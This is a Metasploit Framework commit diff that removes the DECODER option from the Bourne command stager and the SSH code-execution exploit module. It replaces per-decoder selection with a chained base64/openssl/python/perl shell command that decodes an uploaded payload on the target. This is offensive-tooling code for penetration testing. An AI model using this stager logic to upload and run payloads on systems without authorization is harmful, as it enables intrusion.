Remove the DECODER option

zeroSteiner · zeroSteiner · commit 8b5a83c7f571 · 2013-03-08T15:25:16.000-05:00
diff --git a/lib/msf/core/exploit/cmdstager_bourne.rb b/lib/msf/core/exploit/cmdstager_bourne.rb
@@ -1,7 +1,4 @@
 # -*- coding: binary -*-
-##
-# $Id: cmdstager_bourne.rb
-##
 
 require 'msf/core/exploit/cmdstager'
 
@@ -16,49 +13,9 @@ module Exploit::CmdStagerBourne
 
 	include Msf::Exploit::CmdStager
 
-	def initialize(info = {})
-		super
-
-		register_advanced_options(
-			[
-				OptEnum.new( 'DECODER',  [ false, 'The decoding binary to use', 'auto', ['auto', 'base64', 'openssl', 'python', 'perl']]),
-			], self.class)
-	end
-
 	def create_stager(exe)
 		Rex::Exploitation::CmdStagerBourne.new(exe)
 	end
-
-	def generate_cmdstager(opts = {}, pl = nil)
-		available_decoders = ['base64', 'openssl', 'python', 'perl']
-		opts.merge!({ :decoder => datastore['DECODER'] })
-
-		if opts[:decoder] == 'auto'
-			if self.respond_to? :execute_command_with_feedback
-				available_decoders.each do |bin|
-					which_result = execute_command_with_feedback("which #{bin}", opts).to_s
-					which_result = which_result.strip
-					if which_result.split.length == 1 and which_result.end_with?(bin)
-						opts[:decoder] = bin
-						break
-					end
-				end
-			end
-
-			if opts[:decoder] == 'auto'
-				print_error("Could not detect an appropriate decoder, try setting the DECODER option")
-				raise ArgumentError
-			else
-				print_status("Command Stager using auto-detected decoder: #{opts[:decoder]}")
-			end
-		end
-
-		if not available_decoders.include?(opts[:decoder])
-			print_error("Decoder must be one of #{available_decoders.join(', ')}")
-			raise ArgumentError
-		end
-		super
-	end
 end
 
 end
diff --git a/lib/msf/core/exploit/mixins.rb b/lib/msf/core/exploit/mixins.rb
@@ -1,5 +1,5 @@
 # -*- coding: binary -*-
-# $Id: mixins.rb 16142 2012-11-30 19:45:04Z rapid7 $
+# $Id$
 #
 # All exploit mixins should be added to the list below
 #
diff --git a/lib/rex/exploitation/cmdstager/bourne.rb b/lib/rex/exploitation/cmdstager/bourne.rb
@@ -1,7 +1,4 @@
 # -*- coding: binary -*-
-##
-# $Id: bourne.rb
-##
 
 require 'rex/text'
 require 'rex/arch'
@@ -21,6 +18,8 @@ def initialize(exe)
 
 	def generate(opts = {})
 		opts[:temp] = opts[:temp] || '/tmp/'
+		opts[:temp] = opts[:temp].gsub(/'/, "\\\\'")
+		opts[:temp] = opts[:temp].gsub(/ /, "\\ ")
 		super
 	end
 
@@ -67,18 +66,20 @@ def parts_to_commands(parts, opts)
 	# Generate the commands that will decode the file we just created
 	#
 	def generate_cmds_decoder(opts)
-		case opts[:decoder]
-		when 'base64'
-			decoder = "base64 --decode #{@tempdir}#{@var_encoded}.b64"
-		when 'openssl'
-			decoder = "openssl enc -d -A -base64 -in #{@tempdir}#{@var_encoded}.b64"
-		when 'python'
-			decoder = "python -c 'import sys; import base64; print base64.standard_b64decode(sys.stdin.read());' < #{@tempdir}#{@var_encoded}.b64"
-		when 'perl'
-			decoder = "perl -MIO -e 'use MIME::Base64; while (<>) { print decode_base64($_); }' < #{@tempdir}#{@var_encoded}.b64"
+		decoders = [
+			"base64 --decode #{@tempdir}#{@var_encoded}.b64",
+			"openssl enc -d -A -base64 -in #{@tempdir}#{@var_encoded}.b64",
+			"python -c 'import sys; import base64; print base64.standard_b64decode(sys.stdin.read());' < #{@tempdir}#{@var_encoded}.b64",
+			"perl -MIO -e 'use MIME::Base64; while (<>) { print decode_base64($_); }' < #{@tempdir}#{@var_encoded}.b64"
+		]
+		decoder_cmd = []
+		decoders.each do |cmd|
+			binary = cmd.split(' ')[0]
+			decoder_cmd << "(which #{binary} >&2 && #{cmd})"
 		end
-		decoder << " > #{@tempdir}#{@var_decoded}.bin"
-		[ decoder ]
+		decoder_cmd = decoder_cmd.join(" || ")
+		decoder_cmd = "(" << decoder_cmd << ") 2> /dev/null > #{@tempdir}#{@var_decoded}.bin"
+		[ decoder_cmd ]
 	end
 
 	def compress_commands(cmds, opts)
diff --git a/modules/exploits/multi/ssh/sshexec.rb b/modules/exploits/multi/ssh/sshexec.rb
@@ -1,3 +1,9 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+#   http://metasploit.com/
+##
 
 require 'msf/core'
 require 'net/ssh'
@@ -12,7 +18,6 @@ class Metasploit3 < Msf::Exploit::Remote
 	def initialize
 		super(
 			'Name'        => 'SSH User Code Execution',
-			'Version'     => '',
 			'Description' => %q{
 				This module utilizes a stager to upload a base64 encoded
 				binary which is then decoded, chmod'ed and executed from
@@ -88,16 +93,6 @@ def execute_command(cmd, opts = {})
 		end
 	end
 
-	def execute_command_with_feedback(cmd, opts = {})
-		begin
-			Timeout.timeout(3) do
-				feedback = self.ssh_socket.exec!("#{cmd}\n")
-				return feedback
-			end
-		rescue ::Exception
-		end
-	end
-
 	def do_login(ip, user, pass, port)
 		opt_hash = {
 			:auth_methods  => ['password', 'keyboard-interactive'],

Original file line number	Diff line number	Diff line change
`@@ -1,5 +1,5 @@`
`1`	`1`	`# -- coding: binary --`
`2`		`-# $Id: mixins.rb 16142 2012-11-30 19:45:04Z rapid7 $`
	`2`	`+# $Id$`
`3`	`3`	`#`
`4`	`4`	`# All exploit mixins should be added to the list below`
`5`	`5`	`#`